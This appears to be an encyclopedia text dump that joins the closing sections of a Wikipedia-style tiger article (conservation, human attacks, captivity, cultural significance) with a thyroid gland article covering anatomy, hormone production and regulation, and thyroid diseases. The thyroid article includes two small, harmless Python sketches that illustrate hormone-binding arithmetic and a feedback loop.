for tiger conservation. The Thailand Tiger Action Plan, ratified in 2010, envisioned increasing the country's tiger populations by 50% in the Western Forest Complex and Dong Phayayen–Khao Yai Forest Complex and reestablishing populations in three potential landscapes by 2022. The Indonesian National Tiger Recovery Program, ratified in 2010, aimed at increasing the Sumatran tiger population by 2022. The third strategic and action plan for the conservation of the Sumatran tiger, for the years 2020–2030, revolves around strengthening the management of small tiger population units of fewer than 20 mature individuals and the connectivity between 13 forest patches in North Sumatra and West Sumatra provinces. Increases in anti-poaching patrol efforts in four Russian protected areas during 2011–2014 contributed to reducing poaching, stabilising the tiger population and improving the protection of ungulate populations; poaching and trafficking were declared to be moderate and serious crimes in 2019. Anti-poaching operations were also established in Nepal in 2010, with increased cooperation and intelligence sharing between agencies. These policies have led to many years of "zero poaching", and the country's tiger population has doubled in a decade. Anti-poaching patrols in the large core area of Taman Negara led to a decrease in poaching frequency from 34 detected incidents in 2015–2016 to 20 incidents during 2018–2019; the arrest of seven poaching teams and the removal of snares facilitated the survival of three resident female tigers and at least 11 cubs. In Malaysia, army and police officers are deployed to patrol together with the staff of protected areas. Wildlife corridors are important conservation measures, as they allow tiger populations to connect between protected areas; tigers use at least nine corridors established in the Terai Arc Landscape and Sivalik Hills in both Nepal and India. Corridors in forested areas with low human encroachment are highly suitable. 
In West Sumatra, 12 wildlife corridors were identified as high priorities for mitigating human–wildlife conflicts. In 2019, China and Russia signed a memorandum of understanding for transboundary cooperation between two protected areas, Northeast China Tiger and Leopard National Park and Land of the Leopard National Park, which includes the creation of wildlife corridors and bilateral monitoring and patrolling along the Sino-Russian border. Rescued and rehabilitated problem tigers and orphaned tiger cubs have been released into the wild and monitored in India, Sumatra and Russia. In Kazakhstan, habitat restoration and the reintroduction of prey species in Ile-Balkash Nature Reserve have progressed, and tiger reintroduction is planned for 2025. Reintroduction of tigers is considered possible in eastern Cambodia, once the management of protected areas is improved and forest loss is stabilised. South China tigers are kept and bred in Chinese zoos, with plans to reintroduce their offspring into remote protected areas. Coordinated breeding programmes among zoos have maintained enough genetic diversity in tigers to act as "insurance against extinction in the wild". Relationship with humans Hunting Tigers have been hunted by humans for millennia, as indicated by a painting in the Bhimbetka rock shelters in India dated to 5,000–6,000 years ago. They were hunted throughout their range in Asia, chased on horseback, on elephant-back or even with sled dogs, and killed with spears and, later, firearms. Such hunts were conducted by native governments and empires, such as the Mughal Empire, as well as by European colonists. Tigers were often hunted as trophies and because of their perceived danger. An estimated 80,000 tigers were killed between 1875 and 1925. Attacks In most areas, tigers avoid humans, but attacks are a risk wherever people coexist with them. Dangerous encounters are more likely to occur in edge habitats between wild and agricultural areas. Most attacks on humans are defensive, including the protection of young; however, tigers do sometimes see people as prey. Man-eating tigers tend to be old and disabled; tigers driven from their home ranges are also at risk of turning to man-eating. At the beginning of the 20th century, the Champawat Tiger was responsible for over 430 human deaths in Nepal and India before she was shot by Jim Corbett. This tigress suffered from broken teeth and was unable to kill normal prey; modern authors speculate that subsisting on meagre human flesh forced the cat to kill more and more. Tiger attacks were particularly frequent in Singapore during the mid-19th century, when plantations expanded into the tiger's habitat; in the 1840s, the number of deaths in the area ranged from 200 to 300 annually. Tiger attacks in the Sundarbans caused 1,396 human deaths in the period 1935–2006, according to official records of the Bangladesh Forest Department. Victims of these attacks are typically local villagers who enter the tiger's domain to collect resources like wood and honey; fishermen have been particularly common targets. Methods to counter tiger attacks have included face masks worn backwards, protective clothes, sticks and carefully stationed electrified dummies. Captivity Tigers have been kept in captivity since ancient times. In ancient Rome, tigers were displayed in amphitheatres, where they were slaughtered in venatio hunts and used to kill criminals. The Mongol ruler Kublai Khan is reported to have kept tigers in the 13th century. Starting in the Middle Ages, tigers were kept in European menageries. 
Tigers and other exotic animals were mainly used for the entertainment of elites, but from the 19th century onward they were exhibited more widely to the public. Tigers were particularly big attractions, and their captive population soared. In 2020, there were over 8,000 captive tigers in Asia, over 5,000 in the US and at least 850 in Europe; there are more tigers in captivity than in the wild. Captive tigers may display stereotypical behaviours such as pacing or inactivity. Modern zoos are able to reduce such behaviours with exhibits designed so that the animals can move between separate but connected enclosures. Enrichment items are also important for the cat's welfare and the stimulation of its natural behaviours. Tigers have played prominent roles in circuses and other live performances. Ringling Bros. featured many tiger tamers in the 20th century, including Mabel Stark, who became a big draw and had a long career. She was well known for being able to control the tigers despite being a small woman, and without "manly" tools like whips and guns. Another trainer was Clyde Beatty, who used chairs, whips and guns to provoke tigers and other beasts into acting fierce, which allowed him to appear courageous; he would perform with as many as 40 tigers and lions in one act. From the 1960s onward, trainers like Gunther Gebel-Williams used gentler methods to control their animals. Sara Houcke was dubbed "the Tiger Whisperer", as she trained the cats to obey her by whispering to them. Siegfried & Roy became famous for performing with white tigers in Las Vegas; the act ended in 2003, when a tiger attacked Roy during a performance. In 2009, tigers were the most traded circus animals. The use of tigers and other animals in shows eventually declined in many countries due to pressure from animal rights groups and a greater desire among the public to see the animals in more natural settings; several countries restrict or ban such acts. Tigers have become popular in the exotic pet trade, particularly in the United States, where only 6% of the captive tiger population in 2020 was housed in zoos and other facilities approved by the Association of Zoos and Aquariums. Private collectors are thought to be ill-equipped to provide proper care for tigers, which compromises the animals' welfare; they can also threaten public safety by allowing people to interact with the cats. The keeping of tigers and other big cats by private individuals was banned in the US in 2022. Most countries in the European Union have banned the breeding and keeping of tigers outside licensed zoos and rescue centres, but some still allow private holdings. Cultural significance The tiger is among the most famous of the charismatic megafauna. Kailash Sankhala has called it "a rare combination of courage, ferocity and brilliant colour", while Candy d'Sa calls it "fierce and commanding on the outside, but noble and discerning on the inside". In a 2004 online poll involving more than 50,000 people from 73 countries, the tiger was voted the world's favourite animal with 21% of the vote, narrowly beating the dog. Similarly, a 2018 study found the tiger to be the most popular wild animal, based on surveys as well as appearances on the websites of major zoos and on the posters of some animated films. While the lion has represented royalty and power in Western culture, the tiger has played such a role in various Asian cultures. In ancient China, the tiger was seen as the "king of the forest" and symbolised the power of the emperor. 
In Chinese astrology, the tiger is the third of the 12 signs of the Chinese zodiac and governs the period between 15:00 and 17:00 in the afternoon. The Year of the Tiger is thought to bring "dramatic and extreme events". The White Tiger is one of the Four Symbols of the Chinese constellations, representing the west along with yin and the season of autumn; it is the counterpart to the Azure Dragon, which conversely symbolises the east, yang and springtime. The tiger is one of the animals displayed on the Pashupati seal of the Indus Valley Civilisation. The big cat was depicted on seals and coins during the Chola dynasty of southern India, of which it was the official emblem. Tigers have had religious and folkloric significance. In Buddhism, the tiger, monkey and deer are the Three Senseless Creatures, with the tiger symbolising anger. In Hinduism, the tiger is the vehicle of Durga, the goddess of feminine power and peace, whom the gods created to fight demons. Similarly, in the Greco-Roman world, the tiger was depicted being ridden by the god Dionysus. In Korean mythology, tigers are messengers of the Mountain Gods. In both Chinese and Korean culture, tigers are seen as protectors against evil spirits, and their image was used to decorate homes, tombs and articles of clothing. In the folklore of Malaysia and Indonesia, "tiger shamans" heal the sick by invoking the big cat. Stories of people turning into tigers, and the reverse, are also widespread; in particular, weretigers are people who can change into tigers and back again. The Mnong people of Indochina believed that tigers could shapeshift into humans, and among some indigenous peoples of Siberia it was believed that men would seduce women by transforming into tigers. William Blake's 1794 poem "The Tyger" portrays the animal as a duality of beauty and ferocity. It is the sister poem to "The Lamb" in Blake's Songs of Innocence and of Experience, in which he ponders how God could create two such different creatures. The tiger features in the classic Chinese novel Water Margin, in which a tiger battles, and is slain by, the outlaw Wu Song, while the tiger Shere Khan in Rudyard Kipling's The Jungle Book (1894) is the mortal enemy of the human protagonist Mowgli. Friendly tame tigers have also existed in culture, notably Tigger, the Winnie-the-Pooh character, and Tony the Tiger, the Kellogg's cereal mascot.
Biology and health sciences
Carnivora
null
30078
https://en.wikipedia.org/wiki/Thyroid
Thyroid
The thyroid, or thyroid gland, is an endocrine gland in vertebrates. In humans, it is a butterfly-shaped gland located in the neck below the Adam's apple. It consists of two connected lobes, the lower two-thirds of which are joined by a thin band of tissue called the isthmus (plural: isthmi). Microscopically, the functional unit of the thyroid gland is the spherical thyroid follicle, lined with follicular cells (thyrocytes) and occasional parafollicular cells, which surround a lumen containing colloid. The thyroid gland secretes three hormones: the two thyroid hormones, triiodothyronine (T3) and thyroxine (T4), and a peptide hormone, calcitonin. The thyroid hormones influence the metabolic rate and protein synthesis, and growth and development in children; calcitonin plays a role in calcium homeostasis. Secretion of the two thyroid hormones is regulated by thyroid-stimulating hormone (TSH), which is secreted from the anterior pituitary gland. TSH in turn is regulated by thyrotropin-releasing hormone (TRH), which is produced by the hypothalamus. Thyroid disorders include hyperthyroidism, hypothyroidism, thyroid inflammation (thyroiditis), thyroid enlargement (goitre), thyroid nodules and thyroid cancer. Hyperthyroidism is characterized by excessive secretion of thyroid hormones: the most common cause is the autoimmune disorder Graves' disease. Hypothyroidism is characterized by deficient secretion of thyroid hormones: the most common cause is iodine deficiency. In iodine-deficient regions, hypothyroidism due to iodine deficiency is the leading cause of preventable intellectual disability in children; in iodine-sufficient regions, the most common cause of hypothyroidism is the autoimmune disorder Hashimoto's thyroiditis. Structure Features The thyroid gland is a butterfly-shaped organ composed of two lobes, left and right, connected by a narrow band of tissue called the isthmus. It weighs about 25 grams in adults, with each lobe being about 5 cm long, 3 cm wide and 2 cm thick, and the isthmus about 1.25 cm in height and width. The gland is usually larger in women than in men, and it increases in size during pregnancy. The thyroid lies near the front of the neck, against and around the front of the larynx and trachea. The thyroid cartilage and cricoid cartilage lie just above the gland, below the Adam's apple. The isthmus extends from the second to the third rings of the trachea, with the uppermost part of the lobes extending to the thyroid cartilage and the lowermost around the fourth to sixth tracheal rings. The infrahyoid muscles lie in front of the gland and the sternocleidomastoid muscle to the side. Behind the outer wings of the thyroid lie the two carotid arteries. The trachea, larynx, lower pharynx and esophagus all lie behind the thyroid. In this region, the recurrent laryngeal nerve and the inferior thyroid artery pass next to or within the posterior suspensory ligament (described below). Typically, four parathyroid glands, two on each side, lie between the two layers of the thyroid capsule at the back of the thyroid lobes. The thyroid gland is covered by a thin fibrous capsule, which has an inner and an outer layer. The inner layer extends into the gland and forms the septa that divide the thyroid tissue into microscopic lobules. The outer layer is continuous with the pretracheal fascia, attaching the gland to the cricoid and thyroid cartilages via a thickening of the fascia that forms the posterior suspensory ligament of the thyroid gland, also known as Berry's ligament. 
This attachment causes the thyroid to move up and down with these cartilages during swallowing. Blood, lymph and nerve supply The thyroid is supplied with arterial blood from the superior thyroid artery, a branch of the external carotid artery, and the inferior thyroid artery, a branch of the thyrocervical trunk, and sometimes by an anatomical variant, the thyroid ima artery, which has a variable origin. The superior thyroid artery splits into anterior and posterior branches supplying the thyroid, and the inferior thyroid artery splits into superior and inferior branches. The superior and inferior thyroid arteries join behind the outer part of the thyroid lobes. The venous blood is drained via the superior and middle thyroid veins, which drain to the internal jugular vein, and via the inferior thyroid veins. The inferior thyroid veins originate in a network of veins and drain into the left and right brachiocephalic veins. Both arteries and veins form a plexus between the two layers of the capsule of the thyroid gland. Lymphatic drainage frequently passes through the prelaryngeal lymph nodes (located just above the isthmus) and the pretracheal and paratracheal lymph nodes. The gland receives sympathetic nerve supply from the superior, middle and inferior cervical ganglia of the sympathetic trunk, and parasympathetic nerve supply from the superior laryngeal nerve and the recurrent laryngeal nerve. Variation There are many variants in the size and shape of the thyroid gland, and in the position of the embedded parathyroid glands. Sometimes a third lobe, called the pyramidal lobe, is present. When present, this lobe often stretches up to the hyoid bone from the thyroid isthmus and may consist of one or several divided lobes. The presence of this lobe ranges in reported studies from 18.3% to 44.6%; it more often arises from the left side and is occasionally separate. The pyramidal lobe is also known as Lalouette's pyramid; it is a remnant of the thyroglossal duct, which usually wastes away during the thyroid gland's descent. Small accessory thyroid glands may in fact occur anywhere along the thyroglossal duct, from the foramen cecum of the tongue to the position of the thyroid in the adult. A small horn at the back of the thyroid lobes, usually close to the recurrent laryngeal nerve and the inferior thyroid artery, is called Zuckerkandl's tubercle. Other variants include a levator muscle of the thyroid gland, connecting the isthmus to the body of the hyoid bone, and the presence of the small thyroid ima artery. Microanatomy At the microscopic level, there are three primary features of the thyroid: thyroid follicles, thyroid follicular cells and parafollicular cells. Follicles Thyroid follicles are small spherical groupings of cells, 0.02–0.9 mm in diameter, that play the main role in thyroid function. They consist of a rim with a rich blood, nerve and lymphatic supply, which surrounds a core of colloid consisting mostly of a thyroid hormone precursor protein called thyroglobulin, an iodinated glycoprotein. Follicular cells The core of a follicle is surrounded by a single layer of follicular cells. When stimulated by thyroid-stimulating hormone (TSH), these cells secrete the thyroid hormones T3 and T4. They do this by transporting and metabolising the thyroglobulin contained in the colloid. Follicular cells vary in shape from flat to cuboid to columnar, depending on how active they are. 
Follicular lumen The follicular lumen is the fluid-filled space within a follicle of the thyroid gland; there are hundreds of follicles within the gland. A follicle is formed by a spherical arrangement of follicular cells. The follicular lumen is filled with colloid, a concentrated solution of thyroglobulin, and is the site of synthesis of the thyroid hormones thyroxine (T4) and triiodothyronine (T3). Parafollicular cells Scattered among the follicular cells, and in the spaces between the spherical follicles, are another type of thyroid cell, the parafollicular cells. These cells secrete calcitonin and so are also called C cells. Development In the development of the embryo, at 3–4 weeks of gestational age, the thyroid gland appears as an epithelial proliferation in the floor of the pharynx at the base of the tongue, between the tuberculum impar and the copula linguae. The copula soon becomes covered over by the hypopharyngeal eminence, at a point later indicated by the foramen cecum. The thyroid then descends in front of the pharyngeal gut as a bilobed diverticulum through the thyroglossal duct. Over the next few weeks, it migrates to the base of the neck, passing in front of the hyoid bone. During migration, the thyroid remains connected to the tongue by a narrow canal, the thyroglossal duct. At the end of the fifth week the thyroglossal duct degenerates, and over the following two weeks the detached thyroid migrates to its final position. The fetal hypothalamus and pituitary start to secrete thyrotropin-releasing hormone (TRH) and thyroid-stimulating hormone (TSH); TSH is first measurable at 11 weeks. By 18–20 weeks, the production of thyroxine (T4) reaches a clinically significant and self-sufficient level. Fetal triiodothyronine (T3) remains low (less than 15 ng/dL) until 30 weeks, and increases to 50 ng/dL at full term. The fetus needs to be self-sufficient in thyroid hormones in order to guard against the neurodevelopmental disorders that would arise from maternal hypothyroidism; the presence of sufficient iodine is essential for healthy neurodevelopment. The neuroendocrine parafollicular cells, also known as C cells, which are responsible for the production of calcitonin, are derived from foregut endoderm. This part of the thyroid first forms as the ultimopharyngeal body, which begins in the ventral fourth pharyngeal pouch and joins the primordial thyroid gland during its descent to its final location. Aberrations in prenatal development can result in various forms of thyroid dysgenesis, which can cause congenital hypothyroidism and, if untreated, lead to cretinism. Function Thyroid hormones The primary function of the thyroid is the production of the iodine-containing thyroid hormones, triiodothyronine (T3) and thyroxine or tetraiodothyronine (T4), and the peptide hormone calcitonin. The thyroid hormones are created from iodine and tyrosine: T3 is so named because it contains three atoms of iodine per molecule, and T4 because it contains four. The thyroid hormones have a wide range of effects on the human body. These include: Metabolic. The thyroid hormones increase the basal metabolic rate and have effects on almost all body tissues. Appetite, the absorption of substances and gut motility are all influenced by thyroid hormones. They increase the absorption of glucose in the gut, as well as its generation, its uptake by cells and its breakdown. They stimulate the breakdown of fats and increase the number of free fatty acids. 
Despite increasing free fatty acids, thyroid hormones decrease cholesterol levels, perhaps by increasing the rate of secretion of cholesterol in bile. Cardiovascular. The hormones increase the rate and strength of the heartbeat. They increase the rate of breathing, the intake and consumption of oxygen, and the activity of mitochondria. Combined, these factors increase blood flow and the body's temperature. Developmental. Thyroid hormones are important for normal development. They increase the growth rate of young people, and cells of the developing brain are a major target for the thyroid hormones T3 and T4. Thyroid hormones play a particularly crucial role in brain maturation during fetal development and the first few years of postnatal life. The thyroid hormones also play a role in maintaining normal sexual function, sleep and thought patterns. Increased levels are associated with increased speed of thought generation but decreased focus. Sexual function, including libido and the maintenance of a normal menstrual cycle, is influenced by thyroid hormones. After secretion, only a very small proportion of the thyroid hormones travel freely in the blood. Most are bound to thyroxine-binding globulin (about 70%), transthyretin (10%) and albumin (15%). Only the 0.03% of T4 and 0.3% of T3 travelling freely have hormonal activity. In addition, up to 85% of the T3 in blood is produced following conversion from T4 by iodothyronine deiodinases in organs around the body. Thyroid hormones act by crossing the cell membrane and binding to the intracellular nuclear thyroid hormone receptors TR-α1, TR-α2, TR-β1 and TR-β2, which bind with hormone response elements and transcription factors to modulate DNA transcription. In addition to these actions on DNA, the thyroid hormones also act within the cell membrane or within the cytoplasm via reactions with enzymes, including calcium ATPase, adenylyl cyclase and glucose transporters. Hormone production The thyroid hormones are created from thyroglobulin, a protein within the colloid in the follicular lumen that is originally created within the rough endoplasmic reticulum of follicular cells and then transported into the follicular lumen. Thyroglobulin contains 123 units of tyrosine, which react with iodine within the follicular lumen. Iodine is essential for the production of the thyroid hormones. Iodine (I0) travels in the blood as iodide (I−), which is taken up into the follicular cells by a sodium-iodide symporter, a transport protein on the cell membrane that in the same action carries two sodium ions and an iodide ion into the cell. Iodide then travels from within the cell into the lumen through the action of pendrin, an iodide-chloride antiporter. In the follicular lumen, the iodide is oxidized to iodine. This makes it more reactive, and the iodine is attached to the active tyrosine units in thyroglobulin by the enzyme thyroid peroxidase. This forms the precursors of the thyroid hormones: monoiodotyrosine (MIT) and diiodotyrosine (DIT). When the follicular cells are stimulated by thyroid-stimulating hormone, they reabsorb thyroglobulin from the follicular lumen. The iodinated tyrosines are cleaved, forming the thyroid hormones T4 and T3, as well as DIT, MIT and traces of reverse triiodothyronine. T3 and T4 are released into the blood. The hormones secreted from the gland are about 80–90% T4 and about 10–20% T3. Deiodinase enzymes in peripheral tissues remove the iodine from MIT and DIT and convert T4 to T3 and RT3. 
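As a rough illustration of the carrier-protein and free-hormone percentages quoted above, the following Python sketch splits a notional total T4 pool into its bound and free fractions. It is purely arithmetic on the article's approximate figures (which do not sum exactly to 100%); the pool size of 100 units is an arbitrary assumption, not a reference value.

```python
# Toy arithmetic sketch (not clinical software): splitting a notional total
# plasma T4 pool across the carrier proteins using the approximate
# percentages quoted in the text. The quoted fractions do not sum exactly
# to 100%; the remainder is simply left unassigned here.

BINDING_FRACTIONS = {
    "thyroxine-binding globulin": 0.70,  # ~70% of circulating T4
    "transthyretin": 0.10,               # ~10%
    "albumin": 0.15,                     # ~15%
}
FREE_T4_FRACTION = 0.0003  # only ~0.03% travels free and is hormonally active


def t4_distribution(total_t4: float) -> dict:
    """Split a total T4 amount (arbitrary units) into free and bound pools."""
    pools = {"free (active)": total_t4 * FREE_T4_FRACTION}
    for carrier, fraction in BINDING_FRACTIONS.items():
        pools[carrier] = total_t4 * fraction
    return pools


if __name__ == "__main__":
    # 100.0 is an arbitrary illustrative pool size, not a reference value.
    for pool, amount in t4_distribution(100.0).items():
        print(f"{pool}: {amount:.3f} units")
```

Running the sketch makes the key point of the paragraph concrete: of 100 units of circulating T4, only about 0.03 units are free and biologically active.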
Peripheral deiodination is a major source of both the RT3 (95%) and the T3 (87%) found in peripheral tissues. Regulation The production of thyroxine and triiodothyronine is primarily regulated by thyroid-stimulating hormone (TSH), released by the anterior pituitary gland. TSH release is in turn stimulated by thyrotropin-releasing hormone (TRH), released in a pulsatile manner from the hypothalamus. The thyroid hormones provide negative feedback on this axis: when thyroid hormone levels are high, TSH production is suppressed (a toy numerical sketch of this feedback loop is given below). Negative feedback also occurs when levels of TSH are high, causing TRH production to be suppressed. TRH is secreted at an increased rate in situations such as cold exposure, in order to stimulate thermogenesis. In addition to being suppressed by the presence of thyroid hormones, TSH production is blunted by dopamine, somatostatin and glucocorticoids. Calcitonin The thyroid gland also produces the hormone calcitonin, which helps regulate blood calcium levels. Parafollicular cells produce calcitonin in response to high blood calcium. Calcitonin decreases the release of calcium from bone by decreasing the activity of osteoclasts, the cells that break down bone. Bone is constantly reabsorbed by osteoclasts and created by osteoblasts, so calcitonin effectively stimulates the movement of calcium into bone. The effects of calcitonin are opposite those of the parathyroid hormone (PTH) produced in the parathyroid glands. However, calcitonin seems far less essential than PTH, since calcium metabolism remains clinically normal after removal of the thyroid (thyroidectomy), but not of the parathyroid glands. Gene and protein expression About 20,000 protein-coding genes are expressed in human cells, and 70% of these genes are expressed in thyroid cells. Some 250 of these genes are more specifically expressed in the thyroid, and about 20 genes are highly thyroid-specific. In the follicular cells, the proteins synthesised by these genes direct thyroid hormone synthesis (thyroglobulin, TPO and IYD), while in the parafollicular C cells they direct calcitonin synthesis (CALCA and CALCB). Clinical significance General practitioners and internal medicine specialists play a role in identifying and monitoring the treatment of thyroid disease. Endocrinologists and thyroidologists are thyroid specialists, while thyroid surgeons and otolaryngologists are responsible for the surgical management of thyroid disease. Functional disorders Hyperthyroidism Excessive production of the thyroid hormones is called hyperthyroidism. Causes include Graves' disease, toxic multinodular goitre, solitary thyroid adenoma, inflammation and a pituitary adenoma that secretes excess TSH. Another cause is excess iodine availability, either from excess ingestion, induced by the drug amiodarone, or following iodinated contrast imaging. Hyperthyroidism often causes a variety of non-specific symptoms, including weight loss, increased appetite, insomnia, decreased tolerance of heat, tremor, palpitations, anxiety and nervousness. In some cases it can cause chest pain, diarrhoea, hair loss and muscle weakness. Such symptoms may be managed temporarily with drugs such as beta blockers. Long-term management of hyperthyroidism may include drugs that suppress thyroid function, such as propylthiouracil, carbimazole and methimazole. Alternatively, radioactive iodine-131 can be used to destroy thyroid tissue: radioactive iodine is selectively taken up by thyroid cells, which over time destroys them. 
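Returning to the regulation paragraph above, the stabilising effect of the negative feedback can be illustrated with a deliberately crude simulation. Everything in this Python sketch — the set point, the gain, the clearance rate and the units — is an invented assumption chosen for illustration; it models only the feedback logic (TSH falls as T4 rises, T4 output follows TSH), not real physiology or pharmacology.

```python
# Deliberately crude simulation of the negative feedback described above.
# Every constant (set point, gain, clearance, units) is an invented
# assumption for illustration; this models the feedback *logic* only.

def simulate_hpt_feedback(steps: int = 50, t4: float = 0.2):
    """Iterate a toy pituitary–thyroid loop and return (TSH, T4) per step."""
    setpoint = 1.0  # notional "normal" T4 level (arbitrary units)
    gain = 2.0      # how strongly TSH responds to a T4 deficit
    trajectory = []
    for _ in range(steps):
        # Pituitary: TSH secretion falls as T4 rises above the set point.
        tsh = max(0.0, 1.0 + gain * (setpoint - t4))
        # Thyroid: T4 is partly cleared (90% retained) and produced in
        # proportion to the current TSH level.
        t4 = 0.9 * t4 + 0.1 * tsh
        trajectory.append((tsh, t4))
    return trajectory


if __name__ == "__main__":
    for step, (tsh, t4) in enumerate(simulate_hpt_feedback()):
        if step % 10 == 0:
            print(f"step {step:2d}: TSH = {tsh:.2f}, T4 = {t4:.2f}")
```

Starting from a low T4 level, both variables converge on the notional set point, which is the qualitative behaviour the feedback loop enforces: a T4 deficit raises TSH, TSH drives T4 production, and rising T4 then suppresses TSH again.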
The choice of first-line treatment for hyperthyroidism depends on the individual and on the country where they are treated. Surgery to remove the thyroid can sometimes be performed as a transoral thyroidectomy, a minimally invasive procedure. Surgery does, however, carry a risk of damage to the parathyroid glands and to the recurrent laryngeal nerve, which innervates the vocal cords. If the entire thyroid gland is removed, hypothyroidism will inevitably result, and thyroid hormone substitutes will be needed. Hypothyroidism An underactive thyroid gland results in hypothyroidism. Typical symptoms are abnormal weight gain, tiredness, constipation, heavy menstrual bleeding, hair loss, cold intolerance and a slow heart rate. Iodine deficiency is the most common cause of hypothyroidism worldwide, while the autoimmune disease Hashimoto's thyroiditis is the most common cause in the developed world. Other causes include congenital abnormalities, diseases causing transient inflammation, surgical removal or radioablation of the thyroid, the drugs amiodarone and lithium, amyloidosis and sarcoidosis. Some forms of hypothyroidism can result in myxedema, and severe cases can result in myxedema coma. Hypothyroidism is managed with replacement of the thyroid hormones, usually given daily as an oral supplement, which may take a few weeks to become effective. Some causes of hypothyroidism, such as postpartum thyroiditis and subacute thyroiditis, may be transient and pass over time, and other causes, such as iodine deficiency, may be rectified with dietary supplementation. Diseases Graves' disease Graves' disease is an autoimmune disorder that is the most common cause of hyperthyroidism. In Graves' disease, for an unknown reason, autoantibodies develop against the thyroid-stimulating hormone receptor. These antibodies activate the receptor, leading to the development of a goitre and symptoms of hyperthyroidism such as heat intolerance, weight loss, diarrhoea and palpitations. Occasionally such antibodies block rather than activate the receptor, leading to symptoms associated with hypothyroidism. In addition, gradual protrusion of the eyes may occur, called Graves' ophthalmopathy, as may swelling of the front of the shins. Graves' disease can be diagnosed by the presence of pathognomonic features such as involvement of the eyes and shins, by the isolation of autoantibodies, or by the results of a radiolabelled uptake scan. Graves' disease is treated with anti-thyroid drugs such as propylthiouracil, which decrease the production of thyroid hormones but carry a high rate of relapse. If there is no involvement of the eyes, the use of radioactive isotopes to ablate the gland may be considered. Surgical removal of the gland with subsequent thyroid hormone replacement may also be considered; however, this will not control the symptoms associated with the eyes or skin. Nodules Thyroid nodules are often found on the gland, with a prevalence of 4–7%. The majority of nodules do not cause any symptoms, thyroid hormone secretion is normal, and they are non-cancerous. Non-cancerous nodules include simple cysts, colloid nodules and thyroid adenomas. Malignant nodules, which occur in only about 5% of cases, include follicular, papillary and medullary carcinomas, and metastases from other sites. Nodules are more likely in females, in those exposed to radiation and in those who are iodine-deficient. When a nodule is present, thyroid function tests determine whether the nodule is secreting excess thyroid hormones, causing hyperthyroidism. 
When the thyroid function tests are normal, an ultrasound is often used to investigate the nodule and provide information such as whether the nodule is fluid-filled or a solid mass, and whether its appearance suggests a benign or a malignant lesion. A needle aspiration biopsy may then be performed, and the sample undergoes cytology, in which the appearance of the cells is examined to determine whether they resemble normal or cancerous cells. The presence of multiple nodules is called a multinodular goitre; if it is associated with hyperthyroidism, it is called a toxic multinodular goitre. Goitre An enlarged thyroid gland is called a goitre. Goitres are present in some form in about 5% of people and result from a large number of causes, including iodine deficiency, autoimmune disease (both Graves' disease and Hashimoto's thyroiditis), infection, inflammation and infiltrative diseases such as sarcoidosis and amyloidosis. Sometimes no cause can be found, a state called "simple goitre". Some forms of goitre are associated with pain, whereas many cause no symptoms at all. Enlarged goitres may extend beyond the normal position of the thyroid gland to below the sternum, or around the airway or esophagus. Goitres may be associated with hyperthyroidism or hypothyroidism, relating to their underlying cause. Thyroid function tests may be done to investigate the cause and effects of a goitre. The underlying cause may be treated; however, many goitres with no associated symptoms are simply monitored. Inflammation Inflammation of the thyroid is called thyroiditis and may cause symptoms of hyperthyroidism or hypothyroidism. Two types of thyroiditis, Hashimoto's thyroiditis and postpartum thyroiditis, initially present with hyperthyroidism and are sometimes followed by a period of hypothyroidism. There are other disorders that cause inflammation of the thyroid, including subacute thyroiditis, acute thyroiditis, silent thyroiditis, Riedel's thyroiditis and traumatic injury, including palpation thyroiditis. Hashimoto's thyroiditis is an autoimmune disorder in which the thyroid gland is infiltrated by lymphocytes, both B cells and T cells, which progressively destroy the thyroid gland. In this way, Hashimoto's thyroiditis may occur insidiously and only be noticed when thyroid hormone production decreases, causing symptoms of hypothyroidism. Hashimoto's is more common in females than males, much more common after the age of 60, and has known genetic risk factors. Type 1 diabetes, pernicious anaemia, Addison's disease and vitiligo are also more common in individuals with Hashimoto's thyroiditis. Postpartum thyroiditis sometimes occurs following childbirth. After delivery, the thyroid becomes inflamed, and the condition initially presents with a period of hyperthyroidism followed by hypothyroidism and, usually, a return to normal function. The course of the illness takes place over several months and is characterised by a painless goitre. Antibodies against thyroid peroxidase can be found on testing. The inflammation usually resolves without treatment, although thyroid hormone replacement may be needed during the period of hypothyroidism. Cancer The most common tumor affecting the thyroid is a benign adenoma, usually presenting as a painless mass in the neck. Thyroid cancers are most often carcinomas, although cancer can occur in any tissue that the thyroid consists of, including cancers of the C cells and lymphomas. 
Cancers from other sites also rarely lodge in the thyroid. Radiation to the head and neck is a risk factor for thyroid cancer, and cancer is more common in women than men, occurring at a ratio of about 2:1. In most cases, thyroid cancer presents as a painless mass in the neck; it is very unusual for thyroid cancers to present with other symptoms, although in some cases a cancer may cause hyperthyroidism. Most thyroid cancers are papillary, followed by follicular, medullary and thyroid lymphoma. Because of the prominence of the thyroid gland, cancer is often detected earlier in the course of disease as the cause of a nodule, which may undergo fine-needle aspiration. Thyroid function tests will help reveal whether the nodule produces excess thyroid hormones. A radioactive iodine uptake test can help reveal the activity and location of the cancer and metastases. Thyroid cancers are treated by removing all or part of the thyroid gland. Radioactive iodine-131 may be given to radioablate the thyroid. Thyroxine is given to replace the lost hormones and to suppress TSH production, as TSH may stimulate recurrence. With the exception of the rare anaplastic thyroid cancer, which carries a very poor prognosis, most thyroid cancers carry an excellent prognosis and can even be considered curable. Congenital A persistent thyroglossal duct is the most common clinically significant birth defect of the thyroid gland. A persistent sinus tract may remain as a vestigial remnant of the tubular development of the thyroid gland. Parts of this tube may be obliterated, leaving small segments to form thyroglossal cysts. Preterm neonates are at risk of hypothyroidism, as their thyroid glands are insufficiently developed to meet their postnatal needs. In order to detect hypothyroidism in newborn babies and prevent growth and developmental abnormalities in later life, many countries have newborn screening programmes at birth. Infants with thyroid hormone deficiency (congenital hypothyroidism) can manifest problems of physical growth and development as well as brain development, termed cretinism. Children with congenital hypothyroidism are treated supplementally with levothyroxine, which facilitates normal growth and development. Mucinous, clear secretions may collect within thyroglossal cysts to form either spherical masses or fusiform swellings, rarely larger than 2 to 3 cm in diameter; these are present in the midline of the neck, anterior to the trachea. Segments of the duct and cysts that occur high in the neck are lined by stratified squamous epithelium, essentially identical to that covering the posterior portion of the tongue in the region of the foramen cecum. Those that occur in the lower neck, closer to the thyroid gland, are lined by epithelium resembling the thyroidal acinar epithelium. Characteristically, next to the lining epithelium there is an intense lymphocytic infiltrate. Superimposed infection may convert these lesions into abscess cavities and, rarely, give rise to cancers. Another disorder is thyroid dysgenesis, which can result in various presentations of one or more misplaced accessory thyroid glands; these can be asymptomatic. Iodine Iodine deficiency, most common in inland and mountainous areas, can predispose to goitre; if widespread, this is known as endemic goitre. Pregnant women deficient in iodine can give birth to infants with thyroid hormone deficiency. 
